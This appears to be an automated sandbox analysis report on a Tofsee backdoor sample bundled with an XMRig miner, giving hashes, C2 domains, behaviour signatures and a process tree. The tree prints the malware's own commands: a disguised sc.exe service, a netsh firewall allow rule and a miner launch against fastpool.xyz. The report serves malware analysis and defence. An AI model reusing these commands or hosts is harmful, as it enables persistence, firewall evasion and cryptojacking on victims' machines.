Overview

overview

10

Static

static

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/12/2022, 10:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3c944419acbb768cc6b835ee1ab8b237f1e2bb2ff3dfd8acc5a0b063ee05ca53.exe

  • Size

    215KB

  • MD5

    1155cca88de1e75fcac7df2fdf7d355e

  • SHA1

    7d779be2d7d8dafefee6729eb942ef909c141549

  • SHA256

    3c944419acbb768cc6b835ee1ab8b237f1e2bb2ff3dfd8acc5a0b063ee05ca53

  • SHA512

    52c7847f5b711960a8e0448ed5fb67e59ca93101273996e659d1a19e71629c438c9f6ec3f259d567328e737d36af4778876c399a36076a0ac3ae7555d721f9fc

  • SSDEEP

    3072:wl9FF/Lzj6Rp7nNq2QDOrl87ULPyqIWQU14kibg3uSRQD9FHOil3lk025PH:097/LzTseUjy/3U11i8+3DDjlVklPH

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c944419acbb768cc6b835ee1ab8b237f1e2bb2ff3dfd8acc5a0b063ee05ca53.exe
    "C:\Users\Admin\AppData\Local\Temp\3c944419acbb768cc6b835ee1ab8b237f1e2bb2ff3dfd8acc5a0b063ee05ca53.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ifqpevua\
      2⤵
        PID:4768
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tjpwbnrg.exe" C:\Windows\SysWOW64\ifqpevua\
        2⤵
          PID:2556
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ifqpevua binPath= "C:\Windows\SysWOW64\ifqpevua\tjpwbnrg.exe /d\"C:\Users\Admin\AppData\Local\Temp\3c944419acbb768cc6b835ee1ab8b237f1e2bb2ff3dfd8acc5a0b063ee05ca53.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:2208
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description ifqpevua "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1592
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start ifqpevua
          2⤵
          • Launches sc.exe
          PID:2100
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1840
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 1040
          2⤵
          • Program crash
          PID:2584
      • C:\Windows\SysWOW64\ifqpevua\tjpwbnrg.exe
        C:\Windows\SysWOW64\ifqpevua\tjpwbnrg.exe /d"C:\Users\Admin\AppData\Local\Temp\3c944419acbb768cc6b835ee1ab8b237f1e2bb2ff3dfd8acc5a0b063ee05ca53.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:224
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5052
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 512
          2⤵
          • Program crash
          PID:3612
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2340 -ip 2340
        1⤵
          PID:3432
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2824 -ip 2824
          1⤵
            PID:4528

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\tjpwbnrg.exe
            Filesize

            14.8MB

            MD5

            555dbcc62cb56b17894bd6017e66c2fe

            SHA1

            1ba6612b856f30d9f690863c1119b1eea0064f5b

            SHA256

            7c4eae434219ce815ef6d25b7399cef21a0df3ac31a5ab0b7b08caa306ac01e5

            SHA512

            20d53ba076ae2dc9cc2ca268498c2077d2619cdb0b267c2a5bf4c602f2496965b1663e6bc6de13194d21572aac2655391231ecd66c5b3ec15879b3538e16129a

            Download Submit

          • C:\Windows\SysWOW64\ifqpevua\tjpwbnrg.exe
            Filesize

            14.8MB

            MD5

            555dbcc62cb56b17894bd6017e66c2fe

            SHA1

            1ba6612b856f30d9f690863c1119b1eea0064f5b

            SHA256

            7c4eae434219ce815ef6d25b7399cef21a0df3ac31a5ab0b7b08caa306ac01e5

            SHA512

            20d53ba076ae2dc9cc2ca268498c2077d2619cdb0b267c2a5bf4c602f2496965b1663e6bc6de13194d21572aac2655391231ecd66c5b3ec15879b3538e16129a

            Download Submit

          • memory/224-159-0x0000000000BE0000-0x0000000000BF0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/224-152-0x00000000008B0000-0x00000000008C5000-memory.dmp

            Filesize

            84KB

            Download

          • memory/224-165-0x0000000007480000-0x000000000788B000-memory.dmp

            Filesize

            4.0MB

            Download

          • memory/224-162-0x0000000000BF0000-0x0000000000BF5000-memory.dmp

            Filesize

            20KB

            Download

          • memory/224-168-0x0000000001DE0000-0x0000000001DE7000-memory.dmp

            Filesize

            28KB

            Download

          • memory/224-151-0x00000000008B0000-0x00000000008C5000-memory.dmp

            Filesize

            84KB

            Download

          • memory/224-146-0x00000000008B0000-0x00000000008C5000-memory.dmp

            Filesize

            84KB

            Download

          • memory/224-156-0x0000000000BD0000-0x0000000000BD6000-memory.dmp

            Filesize

            24KB

            Download

          • memory/224-153-0x0000000002600000-0x000000000280F000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/2340-133-0x00000000005B0000-0x00000000005C3000-memory.dmp

            Filesize

            76KB

            Download

          • memory/2340-144-0x0000000000400000-0x0000000000460000-memory.dmp

            Filesize

            384KB

            Download

          • memory/2340-143-0x0000000000762000-0x0000000000773000-memory.dmp

            Filesize

            68KB

            Download

          • memory/2340-132-0x0000000000762000-0x0000000000773000-memory.dmp

            Filesize

            68KB

            Download

          • memory/2340-134-0x0000000000400000-0x0000000000460000-memory.dmp

            Filesize

            384KB

            Download

          • memory/2824-150-0x0000000000400000-0x0000000000460000-memory.dmp

            Filesize

            384KB

            Download

          • memory/2824-149-0x00000000007DE000-0x00000000007EE000-memory.dmp

            Filesize

            64KB

            Download

          • memory/5052-172-0x0000000000EE0000-0x0000000000FD1000-memory.dmp

            Filesize

            964KB

            Download

          • memory/5052-177-0x0000000000EE0000-0x0000000000FD1000-memory.dmp

            Filesize

            964KB

            Download